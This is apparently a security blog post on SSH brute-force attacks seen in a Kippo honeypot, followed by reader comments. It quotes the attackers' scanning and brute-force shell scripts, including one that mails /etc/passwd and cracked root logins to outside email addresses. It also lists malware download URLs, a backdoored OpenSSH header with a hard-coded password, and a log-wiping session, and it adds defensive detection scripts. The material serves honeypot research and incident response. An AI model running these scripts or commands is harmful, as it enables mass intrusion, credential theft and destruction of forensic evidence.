Kippo

I have been running Kippo for a couple of months now…

I will skip the configuration and setup since it has been covered extremely well by multiple blogs (links at the bottom).

Back in the day (the mid-to-late 90s, for me at least) people were brute-force scanning SSH. Guess what… they still are.

The majority of the people scanning use the same basic kit. It consists of a few variants of shell scripts used to launch the attack, but the two core components, pscan (written in the 90s) and the SSH brute forcer, never change: pscan sweeps a network range for hosts with port 22 open and writes the hits to a file, and the brute forcer then walks that list trying a bundled user/password list with a fixed number of parallel connections.

Examples of shell scripts/pscan/ssh brute force

#!/bin/bash
#
# by lizard
#

if [ $# != 1 ]; then
echo " usage: $0 <b class>"
exit;
fi

rm -rf scan.log

echo "# Scanăm $1 pe port 22"                          # Romanian: "Scanning $1 on port 22"
echo -e "\033[1;36m===    -=PaTroNu Private Scanner=-    ==="
echo -e "\033[1;37m ==         #Private shit#            =="
echo -e "\033[1;36m  =      -Don't share this!-          ="
echo
echo
sleep 1
././pscan2 $1 22          # sweep the /16 ("b class") for port 22; results go to $1.pscan.22
echo "--==: Hai sa vedem .. :==--"                     # Romanian: "Let's see .."
./sshd 100                # the brute forcer; the argument is the number of parallel connections
echo "Cam atat ...hai, next"                           # Romanian: "That's about it ... come on, next"
sleep 10

 

#!/bin/bash
if [ $# != 1 ]; then
echo " usage: $0 <b class>"
exit;
fi

# (one line missing from the listing as posted)
echo -e "\033[1;31m«\033[1;32m Created bY MaLa \033[1;31m»\033[0m"
echo "INCERC SA DAU VIATZA CIBERNETICI"                # Romanian: "Trying to bring cybernetics to life"

./pscan2 $1 22            # sweep the /16 for port 22; pscan2 writes the hits to $1.pscan.22

sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt                  # de-duplicated target list
oopsnr2=`grep -c . mfu.txt`                            # number of targets (computed but never used)
echo "# SA VEDEM CE PULA MEA FACEM"                    # Romanian (vulgar): "Let's see what the hell we do"
echo "#          _ ____) _______"
echo "#         (_)[_bY_]{}<MaLa> "
echo "#         /     )_/         "
echo "#.......si DE root  ....... "                    # Romanian: "...and for root..."
echo "                            "
# The kit ships five password lists named 1..5. Each pass copies one of
# them over pass_file, the file ssh-scan reads, and runs the brute forcer
# again with (presumably) 100 parallel connections.
echo -e "Checking\033[1;34m user file\033[0m pass 1"
cp 1 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking\033[1;31m root file\033[0m pass 2"
cp 2 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking\033[1;34m user file\033[0m pass 3"
cp 3 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking\033[1;34m user file\033[0m pass 4"
cp 4 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking\033[1;31m root file\033[0m pass 5"
cp 5 pass_file
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo -e "\033[1;31m«\033[1;32mFuck .. continuam .. \033[1;31m»\033[0m"   # Romanian: "Fuck .. we continue .."

 

#!/bin/bash

# First the kit fingerprints the box it is running on and mails the result
# to its author: whoever uses this scanner also reports every compromised
# host (and the account list in /etc/passwd) back to the kit's owner.
echo "[+] [+] [+] RK [+] [+] [+]" >> info2
echo "[+] [+] [+] IP [+] [+] [+]" >> info2
/sbin/ifconfig -a >> info2
echo "[+] [+] [+] uptime [+] [+] [+]" >> info2
uptime >> info2
echo "[+] [+] [+] uname -a [+] [+] [+]" >> info2
uname -a >> info2
echo "[+] [+] [+] /etc/issue [+] [+] [+]" >> info2
cat /etc/issue >> info2
echo "[+] [+] [+] passwd [+] [+] [+]" >> info2
cat /etc/passwd >> info2
echo "[+] [+] [+] id [+] [+] [+]" >> info2
id >> info2
echo "[+] [+] [+] Spatiu Hdd / pwd [+] [+] [+]" >> info2         # "Spatiu Hdd" = disk space
df -h >> info2
pwd >> info2
cat info2 | mail -s "Scanner MaLa Port : ?? | Pass : stii tu :))" cs.extrem@yahoo.com   # "stii tu" = "you know"
rm -rf info2
clear

# Banner (the ASCII art lost its backslashes when the post was published).
echo "####################################################################"
echo "#                       ______                                  "
echo "#                            .-.      .-.                               "
echo "#                           /                                          "
echo "#                          |     zRR      |                             "
echo "#                          |,  .-.  .-.  ,|                             "

echo "#                          | )(z_/  z_)( |                             "
echo "#                          |/     /     |                             "
echo "#                  _       (_     ^^     _)                             "
echo "#          _ ____) _________|IIIIII|__/_________________________     "
echo "#         (_)[___]{}<________|-IIIIII/-|__zRR__zRR__zRR___________    "
echo "#           /     )_/                  /                               "
echo "#                             ______ /"

echo "#                         SCANER PRIVAT                             "   # "private scanner"
echo "#             SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe               "   # "scanner used only by team MaLaSorTe"
echo "#            SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !!              "   # "the scanner contains a 3 MB pass_file"
echo "####################################################################"

# "a" is the brute forcer renamed (see the error text below). $1 is a /16
# prefix such as 10.20 and every call scans one /24 of it; note the gap
# between .17 and .245. vuln.txt, the harvested logins, is mailed to the
# kit's author three times during the run, so the author gets every root
# this scanner ever finds.
if [ -f a ]; then
cat vuln.txt |mail -s "Lame Gang Us Roots" mafia89tm@yahoo.com
./a $1.0
./a $1.1
./a $1.2
./a $1.3
./a $1.4
./a $1.5
./a $1.6
./a $1.7
./a $1.8
./a $1.9
./a $1.10
cat vuln.txt |mail -s "Lame Gang Us Roots" cs.extrem@yahoo.com
./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16
./a $1.17
./a $1.245
./a $1.246
./a $1.247
./a $1.248
./a $1.249
cat vuln.txt |mail -s "Lame Gang Us Roots" cs.extrem@yahoo.com
./a $1.250
./a $1.251
./a $1.252
./a $1.253
./a $1.254
./a $1.255
killall -9 a
else
echo "# Ciudat ..Nu Ai Urmat Instructiunile  #"        # Romanian: "Strange .. you did not follow the instructions"
echo "# trebui dat mv assh a sau mv scan a   #"        # Romanian: "you had to run mv assh a or mv scan a"
echo "# orice ai avea tu ... dohh ..         #"        # Romanian: "whatever you have ... dohh .."
killall -9 a
killall -9 pscan2
fi

 

 

** pscan.c - Originally by Volatile
** modified by riksta, lizard

Usage: ./pscan2 [c-block]

SSH bruteforcer
- by lizard
Usage:
./sshd
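The kit above leaves a very recognisable footprint in a honeypot log: a burst of login attempts from one source, walking a short user list and a bundled password list, followed by a success on a weak password. As an added example (not code from this post, from Kippo, or from the kit), here is a Python triage script that parses login-attempt lines in the style of Kippo's text log and reports, per source address, the number of attempts, the usernames tried, the most common passwords, the peak guess rate inside a sliding window, and any successful logins. The sample lines are constructed, and the exact field layout of kippo.log is an assumption; adjust LOGIN_RE to match your version.

```python
"""Triage SSH brute-force traffic from Kippo-style log lines.

Added example, not code from the original post or from the Kippo project.
Assumptions: one 'login attempt [user/pass] failed|succeeded' line per
guess, with the source IP as the last field of the transport descriptor.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample lines in the style of kippo.log (layout is an assumption).
SAMPLE_LOG = """\
2010-11-02 09:12:01+0000 [SSHService ssh-userauth on HoneyPotTransport,3,198.51.100.7] login attempt [root/123456] failed
2010-11-02 09:12:02+0000 [SSHService ssh-userauth on HoneyPotTransport,3,198.51.100.7] login attempt [root/password] failed
2010-11-02 09:12:02+0000 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.7] login attempt [root/root] failed
2010-11-02 09:12:03+0000 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.7] login attempt [admin/admin] failed
2010-11-02 09:12:03+0000 [SSHService ssh-userauth on HoneyPotTransport,5,198.51.100.7] login attempt [root/123456] succeeded
2010-11-02 09:12:04+0000 [SSHService ssh-userauth on HoneyPotTransport,5,198.51.100.7] login attempt [postgres/postgres] failed
2010-11-02 10:40:00+0000 [SSHService ssh-userauth on HoneyPotTransport,9,203.0.113.12] login attempt [oracle/oracle] failed
"""

LOGIN_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[.*HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] "
    r"login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>failed|succeeded)$"
)


def parse_attempts(text):
    """Return one dict per login attempt; other Kippo events are skipped."""
    attempts = []
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue
        row = m.groupdict()
        row["ts"] = datetime.strptime(row["ts"], "%Y-%m-%d %H:%M:%S%z")
        attempts.append(row)
    return attempts


def summarize(attempts, window=60, threshold=5):
    """Per-source summary; a source is flagged as brute forcing when it makes
    at least `threshold` guesses inside any `window`-second span."""
    by_ip = defaultdict(list)
    for a in attempts:
        by_ip[a["ip"]].append(a)

    report = {}
    for ip, rows in by_ip.items():
        rows.sort(key=lambda r: r["ts"])
        peak, lo = 0, 0
        for hi in range(len(rows)):          # sliding window over sorted timestamps
            while (rows[hi]["ts"] - rows[lo]["ts"]).total_seconds() > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        report[ip] = {
            "attempts": len(rows),
            "users": sorted({r["user"] for r in rows}),
            "top_passwords": Counter(r["pw"] for r in rows).most_common(3),
            "peak_per_window": peak,
            "successes": [(r["user"], r["pw"]) for r in rows if r["result"] == "succeeded"],
            "brute_force": peak >= threshold,
        }
    return report


if __name__ == "__main__":
    for ip, info in summarize(parse_attempts(SAMPLE_LOG)).items():
        flag = "BRUTE FORCE" if info["brute_force"] else "single guess"
        print(f"{ip}: {info['attempts']} attempts, peak {info['peak_per_window']}/min, "
              f"users {info['users']}, successes {info['successes']} -> {flag}")
```

The sliding-window rate matters more than the raw count: a kit like the one above makes dozens of guesses a second per target, while a mistyped password from a real user never comes close to the threshold. The successes list is the thing to act on, since each entry is a credential the attacker now believes works.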

 

What's next?

Once access is gained, 99% of them come back and manually try to install one of a couple of IRC bots (Energy Mech, Eggdrop) or psyBNC. I have also seen UDP.pl show up a couple of times; it is an extremely simple Perl-based UDP flooder.

No attempts to install any real backdoor or to clean up the logs after themselves.

A few examples of the files they fetched onto the honeypot:

http://managers.at.ua/piata.tgz.gz
http://tengere.webs.com/bnc/bnc.tgz
http://tengere.webs.com/bnc/psy.tgz
http://tengere.webs.com/bnc/eggdrop.tgz
http://www.vinica.net.mk/irc/emech/e.tar.gz
http://www.tradelinux.org/flood/udp.tgz
http://dh.at.ua/scan.tgz
http://undernet-staff.webs.com/ivan.tar.gz
http://dh.at.ua/scan.tgz
http://www.vinica.net.mk/irc/emech/e.tar.gz

1% of attackers did attempt to install some sort of persistent backdoor and cover their tracks.

The example below is a backdoored build of OpenSSH. Its backdoor.h tells the whole story: a hard-coded password the patched sshd accepts, and logging of the passwords typed at that sshd to a file named to look like a system header under /usr/include, where nobody looks for a text log.

http://dh.at.ua/ssh.tar

backdoor.h
#define BACKDOORPASSWD          "leadrouter"           /* password accepted by the backdoor */
#define LOGGING_PASSWORDS 1                            /* capture passwords seen by this sshd */
#define PASSWORDS_LOG_FILE "/usr/include/gpm2.h"       /* capture file disguised as a header */
int backdoor_active;
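Two cheap host checks follow from that header: the backdoor password is a plain C string literal, so it survives into the compiled sshd, and the capture file is a non-header sitting in an include directory. The script below is an added example (not part of the post or of the dropped tarball) that performs both checks. The "binary" and the include directory it scans are constructed in a temporary directory so it runs offline; on a real host point backdoor_strings() at the sshd that is actually running (the kit above installs its own build under /opt, so check /proc/<pid>/exe rather than assuming /usr/sbin/sshd) and suspicious_headers() at /usr/include. The contents of the fake capture file are invented for the demo.

```python
"""Check a host for the sshd backdoor described by backdoor.h above.

Added example, not from the original post. The password string and the
capture-file location come from the header on this page; the sample files
are constructed here.
"""
import os
import re
import tempfile

BACKDOOR_PASSWORDS = [b"leadrouter"]      # from backdoor.h on this page

# Anything that looks like the start of a real C header: a preprocessor
# directive, a comment, or a declaration keyword. A capture log has none.
C_HEADER_HINT = re.compile(
    rb"^\s*(#\s*(include|define|ifndef|ifdef|if|endif|pragma)\b|/\*|//|"
    rb"typedef\b|extern\b|struct\b|enum\b|union\b)",
    re.M,
)


def backdoor_strings(path, needles=BACKDOOR_PASSWORDS):
    """Return the known backdoor strings found in the binary at `path`.

    The file is read whole, which is fine for an sshd-sized binary.
    """
    with open(path, "rb") as f:
        data = f.read()
    return [n for n in needles if n in data]


def suspicious_headers(include_dir, sniff=4096):
    """Return files under include_dir whose first bytes look nothing like C."""
    hits = []
    for root, _dirs, files in os.walk(include_dir):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as f:
                head = f.read(sniff)
            if head and not C_HEADER_HINT.search(head):
                hits.append(path)
    return sorted(hits)


def check_host(sshd_path, include_dir):
    return {
        "backdoor_strings": backdoor_strings(sshd_path),
        "suspicious_headers": suspicious_headers(include_dir),
    }


def build_demo():
    """Construct a fake sshd and include dir so the checks can run offline."""
    base = tempfile.mkdtemp()
    inc = os.path.join(base, "include")
    os.makedirs(inc)
    with open(os.path.join(inc, "gpm.h"), "wb") as f:        # a legitimate-looking header
        f.write(b"/* General Purpose Mouse */\n#ifndef _GPM_H\n#define _GPM_H\nextern int gpm_fd;\n#endif\n")
    with open(os.path.join(inc, "gpm2.h"), "wb") as f:       # the disguised capture file (format invented)
        f.write(b"root:123456@203.0.113.5\nadmin:admin@203.0.113.5\n")
    sshd = os.path.join(base, "sshd")
    with open(sshd, "wb") as f:                              # stand-in for a backdoored sshd
        f.write(b"\x7fELF" + b"\x00" * 64 + b"Password authentication\x00leadrouter\x00")
    return sshd, inc


if __name__ == "__main__":
    sshd, inc = build_demo()
    print(check_host(sshd, inc))
```

The header heuristic is deliberately loose (it only says "this is not C"), so treat a hit as something to open by hand, not as proof. On a packaged system the stronger check is the package manager's own verification (rpm -V openssh-server, or debsums on Debian-derived systems), which also catches a replaced binary that contains no known string at all.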

However, Kippo's emulated shell never really built or installed it, so once the person could not get it running he attempted to cut and run. At least he tried to clean the logs, although the repeated kill -9 -1 (kill every process the user can signal, which as root is everything) would not have been very subtle, and the `#!/bin/bash` typed at the prompt shows that what follows was a cleanup script pasted into the terminal. Note the `touch` and `sleep` failures: Kippo did not emulate those commands, so the "recreate the log files empty" step silently did nothing. The closing banner "Toate logurile au fost sterse" is Romanian for "all the logs have been deleted".

storm:/root/ssh/ssh# kill -9 -1
storm:/root/ssh/ssh# kill -9 -1
storm:/root/ssh/ssh# kill -9 -1
storm:/root/ssh/ssh# vf /root
bash: vf: command not found
storm:/root/ssh/ssh# cd /root
storm:~# #!/bin/bash
bash: #!/bin/bash: command not found
storm:~# unset HISTFILE
storm:~# unset HISTSAVE
storm:~# history -n
1  uname -a
2  uname -a
3  cat /proc/cpuinfo
4  cat /etc/issue
5  cat /etc/issue
6  make test
7  yum
8  apt-get
9  apt-get install
10  apt-get install make
11  apt-get install openssh*
12  apt-get install openssl*
13  apt-get install make*
14  apt-get install mail*
15  wget dh.at.ua/ssh.tar
16  tar xvf ss
17  tar xvf ss h.tar
18  tar xvf ssh.tar
19  cd ssh
20  cd ssh
21  chmod -R 0700 *;./configure -prefix=/opt -sysconfdir=/etc/ssh;make;mv /etc/ssh/sshd_config /etc/ssh/sshd_backup;make install
22  kill -9 -1
23  kill -9 -1
24  kill -9 -1
25  kill -9 -1
26  kill -9 -1
27  vf /root
28  cd /root
29  #!/bin/bash
30  unset HISTFILE
31  unset HISTSAVE
32  history -n
storm:~# unset WATCH
storm:~# export HISTFILE=/dev/null
storm:~# rm -rf .bash_history
storm:~# rm -rf /var/run/utmp
storm:~# rm -rf /var/run/wtmp –
storm:~# rm -rf /var/log/lastlog
storm:~# rm -rf /usr/adm/lastlog
rm: cannot remove `/usr/adm/lastlog': No such file or directory
storm:~# rm -rf .bash_history
storm:~# cd /var/log/
storm:/var/log# rm -rf wtmp
storm:/var/log# rm -rf secure
storm:/var/log# rm -rf lastlog
storm:/var/log# rm -rf messages
storm:/var/log# touch messagess
bash: touch: command not found
storm:/var/log# touch wtmp
bash: touch: command not found
storm:/var/log# touch secure
bash: touch: command not found
storm:/var/log# touch lastlog
bash: touch: command not found
storm:/var/log# cd /root
storm:~# rm -rf .bash_history
storm:~# touch .bash_history
bash: touch: command not found
storm:~# rm -rf /var/log/wtmp
storm:~# rm -rf /var/log/lastlog
storm:~# rm -rf /var/log/secure
storm:~# rm -rf /var/log/xferlog
storm:~# rm -rf /var/log/messages
storm:~# rm -rf /var/run/utmp
storm:~# touch /var/run/utmp
bash: touch: command not found
storm:~# touch /var/log/wtmp
bash: touch: command not found
storm:~# touch /var/log/xferlog
bash: touch: command not found
storm:~# touch /var/log/secure
bash: touch: command not found
storm:~# touch /var/log/lastlog
bash: touch: command not found
storm:~# rm -rf /var/log/maillog
storm:~# touch /var/log/maillog
bash: touch: command not found
storm:~# echo "            * C O M P L E T E *"
* C O M P L E T E *
storm:~# echo ""
/
storm:~# sleep 2
bash: sleep: command not found
storm:~# echo "            * Toate logurile au fost sterse- @Secret*"
* Toate logurile au fost sterse- @Secret*
storm:~# echo ""
/
storm:~# sleep 5
bash: sleep: command not found
storm:~# exit 1
Connection to server closed.
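Kippo records every command typed, so cleanup like the session above can be flagged mechanically rather than read by eye. The script below is an added example (not from the post) that walks a captured session in the host:cwd# prompt format shown above (an assumption), resolves rm/touch targets against the working directory in the prompt (so "rm -rf wtmp" typed inside /var/log counts), and flags history disabling, kill -9 -1, replacement of sshd_config, and removal or recreation of log files. The transcript is constructed from a subset of the commands above, and ~ is assumed to be /root.

```python
"""Flag anti-forensic commands in a captured shell session.

Added example, not code from the original post or from Kippo. Prompt
format 'host:cwd# command' and root's home being /root are assumptions.
"""
import os
import re

# Constructed from a subset of the session quoted above.
SESSION = """\
storm:/root/ssh/ssh# kill -9 -1
storm:/root/ssh/ssh# cd /root
storm:~# unset HISTFILE
storm:~# export HISTFILE=/dev/null
storm:~# rm -rf .bash_history
storm:~# rm -rf /var/run/utmp
storm:~# cd /var/log/
storm:/var/log# rm -rf wtmp
storm:/var/log# rm -rf secure
storm:/var/log# touch secure
bash: touch: command not found
storm:/var/log# echo "* C O M P L E T E *"
* C O M P L E T E *
"""

PROMPT_RE = re.compile(r"^(?P<host>[^:\s]+):(?P<cwd>\S*)[#$] (?P<cmd>.*)$")
HISTORY_RE = re.compile(r"\bunset\s+HIST(FILE|SAVE|SIZE)\b|\bHISTFILE=/dev/null\b|\bhistory\s+-c\b")
KILLALL_RE = re.compile(r"\bkill\s+-9\s+-1\b")
SSHD_CONFIG_RE = re.compile(r"\bmv\s+/etc/ssh/sshd_config\b")

# Locations whose removal or recreation is log tampering (trailing / = whole tree).
LOG_LOCATIONS = ("/var/log/", "/var/run/utmp", "/var/run/wtmp", "/usr/adm/", "/root/.bash_history")


def resolve(arg, cwd, home="/root"):
    """Absolute, normalised path of a command argument typed in `cwd`."""
    if arg.startswith("~"):
        arg = home + arg[1:]
    if cwd.startswith("~"):
        cwd = home + cwd[1:]
    return os.path.normpath(arg if arg.startswith("/") else os.path.join(cwd, arg))


def is_log_path(path):
    return any(path == loc.rstrip("/") or path.startswith(loc) for loc in LOG_LOCATIONS)


def analyze_session(transcript):
    """Return findings as (kind, command) pairs plus the log paths touched."""
    findings, log_paths = [], set()
    for line in transcript.splitlines():
        m = PROMPT_RE.match(line)
        if not m:
            continue                       # command output, not a typed command
        cmd, cwd = m.group("cmd").strip(), m.group("cwd")
        if HISTORY_RE.search(cmd):
            findings.append(("history_disabled", cmd))
        elif KILLALL_RE.search(cmd):
            findings.append(("kill_all", cmd))
        elif SSHD_CONFIG_RE.search(cmd):
            findings.append(("sshd_config_replaced", cmd))
        else:
            parts = cmd.split()
            if parts and parts[0] in ("rm", "shred", "touch"):
                targets = [resolve(p, cwd) for p in parts[1:] if not p.startswith("-")]
                hits = [t for t in targets if is_log_path(t)]
                if hits:
                    log_paths.update(hits)
                    kind = "log_recreate" if parts[0] == "touch" else "log_wipe"
                    findings.append((kind, cmd))
    return {"findings": findings, "log_paths": sorted(log_paths)}


if __name__ == "__main__":
    result = analyze_session(SESSION)
    for kind, cmd in result["findings"]:
        print(f"{kind:20} {cmd}")
    print("log files to check:", result["log_paths"])
```

On a real (non-honeypot) host the log_paths list is the first thing an incident responder wants: each entry is a file whose absence, zero size, or creation time later than boot is itself evidence, and wtmp/lastlog entries that survived elsewhere (a remote syslog, a backup) should be compared against it.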

 

I will continue running Kippo and work with the newly formed Kippo user group on better ways to track trends in the passwords and software used.

A couple of outside links with information on configuring and running Kippo:

Kippo – http://code.google.com/p/kippo/

Kippo user group – http://groups.google.com/group/kippousers

InfoSanity's blog – http://blog.infosanity.co.uk/

lvdeijk's blog – http://lvdeijk.wordpress.com/

Posted in InfoSec
3 comments on "Kippo"
  1. Ben says:

    My server got hacked with exactly what you described above (as in it had the same "by lizard" line) because I accidentally left the postgres user open to ssh and had a simple password for that user. They then proceeded to run the brute force script to try and hack other servers, and like you say, didn't even bother to cover their tracks.

    One thing I am interested in is why? What are they trying to do? One of the files they left is this:

    handle		ciuvak
    mask		*!*@glamorous.users.undernet.org
    prot		4
    aop
    channel		*
    access		100
    
    handle		ciuvak
    mask		*!*@kodex.users.undernet.org
    prot		4
    aop
    channel		*
    
    handle		Kox
    mask		*!*@Kox.*
    prot		4
    aop
    channel		*
    access		100
    

    What does this mean?

    • justinelze says:

      That is a config for an Energy Mech IRC bot.

      I would imagine they don’t try to cover their tracks because usually people who get hacked that way don’t have the skill set involved to check logs and see what actually happened.

      Also SSH brute forcing takes a very low skill level and these kids most likely don’t know how to install a proper root kit and cover their tracks.

  2. […] escalation vulnerability. From there it was clear that the backdoor installed in our backyard was a well-known SSH exploit harvesting SSH passwords and periodically sending the harvested crop to an external IP. […]
